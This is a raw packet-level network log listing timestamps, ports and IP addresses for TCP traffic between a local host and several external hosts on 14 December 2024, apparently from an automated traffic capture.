Dec 14, 2024 23:58:46.012267113 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.012911081 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.012964010 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.013014078 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.013483047 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.013676882 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.013943911 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.014489889 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.014496088 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:46.014547110 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.014699936 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.014739990 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:46.014743090 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:46.014803886 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.014811993 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:46.015239000 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.015378952 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.016067982 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.016182899 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.016228914 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.016566992 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.016828060 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.016941071 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.017054081 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.017669916 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.017744064 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.017836094 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.018354893 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.018497944 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.019124031 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.019212961 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.019258022 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.019911051 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.020054102 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.020107985 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.020689964 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.020817995 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.020869970 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.021446943 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.021584988 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.022231102 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.022279978 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.022358894 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.023015976 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.023061991 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.023130894 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.023808002 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.023854971 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.023921967 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.024580002 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.024627924 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.024702072 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.025373936 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.025418043 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.025486946 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.026164055 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.026279926 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.026330948 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.026927948 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.027062893 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.027112961 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.027703047 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.027842999 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.028508902 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.028559923 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.028631926 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.029261112 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.029350996 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.029402018 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.029479027 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.030076027 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.030185938 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.030874968 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.030929089 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.031066895 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.031728029 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.031807899 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.031871080 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.032398939 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.032516003 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.032565117 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.033158064 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.033299923 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.033349991 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.033961058 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.034084082 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.034735918 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.034799099 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.034848928 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.035495996 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.035548925 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.035619974 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.036288023 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.036338091 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.036408901 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.037055016 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.037120104 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.037195921 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.037491083 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.037825108 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.037971020 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.038646936 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.038702965 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.038763046 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.039376974 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.039541006 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.039596081 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.040175915 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.040343046 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.040394068 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.040946007 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.041100025 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.041151047 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.041728020 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.041857004 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.042529106 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.042601109 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.042655945 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.043277979 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.043349981 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.043423891 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.044037104 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.044085026 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.044169903 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.044836044 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.044886112 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.044970036 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.045480967 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.045600891 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.045746088 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.046374083 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.046427965 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.046514988 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.047147036 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.047251940 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.047305107 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.070094109 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:46.083372116 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:46.083373070 CET	49862	443	192.168.2.4	104.102.49.254
Dec 14, 2024 23:58:46.083439112 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:46.083479881 CET	443	49862	104.102.49.254	192.168.2.4
Dec 14, 2024 23:58:46.099173069 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:46.181837082 CET	49855	80	192.168.2.4	185.215.113.206
Dec 14, 2024 23:58:46.199024916 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.199160099 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.199179888 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.199395895 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.199554920 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.199616909 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.199857950 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.200181007 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.200303078 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.200323105 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.200367928 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.200927019 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.200997114 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.201040983 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.201081991 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.201714039 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.201852083 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.202490091 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.202533007 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.202632904 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.203295946 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.203391075 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.203434944 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.204082012 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.204236984 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.204381943 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.204838991 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.204883099 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.204972982 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.205017090 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.205607891 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.205653906 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.205694914 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.205738068 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.206366062 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.206422091 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.206484079 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.206533909 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.207137108 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.207192898 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.207282066 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.207328081 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.207938910 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.208051920 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.208101988 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.208739996 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.208858967 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.208905935 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.209480047 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.209616899 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.209662914 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.210258961 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.210397959 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.210444927 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.211070061 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.211170912 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.211221933 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.211803913 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.211980104 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.212587118 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.212632895 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.212711096 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.213403940 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.213409901 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.213438988 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.213505030 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.214133978 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.214191914 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.214257002 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.214306116 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.214936972 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.214988947 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.215059996 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.215101957 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.215696096 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.215747118 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.215817928 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.215861082 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.216479063 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.216614008 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.216665030 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.217257023 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.217411995 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.217454910 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.218051910 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.218233109 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.218286037 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.218907118 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.218955994 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.218991995 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.219006062 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:46.219464064 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.219597101 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:46.219608068 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.219661951 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.219727993 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.220393896 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.220447063 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.220515966 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.220737934 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.221143961 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.221262932 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.221335888 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.221936941 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.222071886 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.222121000 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.222855091 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.222966909 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.223026991 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.223568916 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.223648071 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.223691940 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.224315882 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.224451065 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.225050926 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.225114107 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.225236893 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.225497007 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.225824118 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.225935936 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.226602077 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.226654053 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.226718903 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.227401018 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.227456093 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.227509022 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.228178024 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.228318930 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.228374958 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.228960991 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.229016066 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.229077101 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.229119062 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.229741096 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.229793072 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.229871988 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.229922056 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.230551004 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.230648041 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.230699062 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.231292009 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.231394053 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.231451035 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.231498003 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.232086897 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.232199907 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.232214928 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.232852936 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.232913017 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.232964039 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.233486891 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.233623028 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.233757973 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.234119892 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.234417915 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.234467983 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.234539986 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.234596014 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.235198975 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.235250950 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.235379934 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.235928059 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.235965967 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.236077070 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.236129045 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.236746073 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.236793041 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.236871958 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.237344980 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.237550020 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.237663984 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.238286018 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.238348961 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.238426924 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.239115953 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.239160061 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.239207983 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.239787102 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.240531921 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.301646948 CET	80	49855	185.215.113.206	192.168.2.4
Dec 14, 2024 23:58:46.339364052 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:46.391364098 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.391422987 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.391590118 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.391618967 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.391673088 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.391673088 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.391819954 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.392365932 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.392374992 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.392509937 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.392585993 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.393160105 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.393266916 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.393326044 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:46.393918037 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:46.394053936 CET	80	49863	185.215.113.16	192.168.2.4
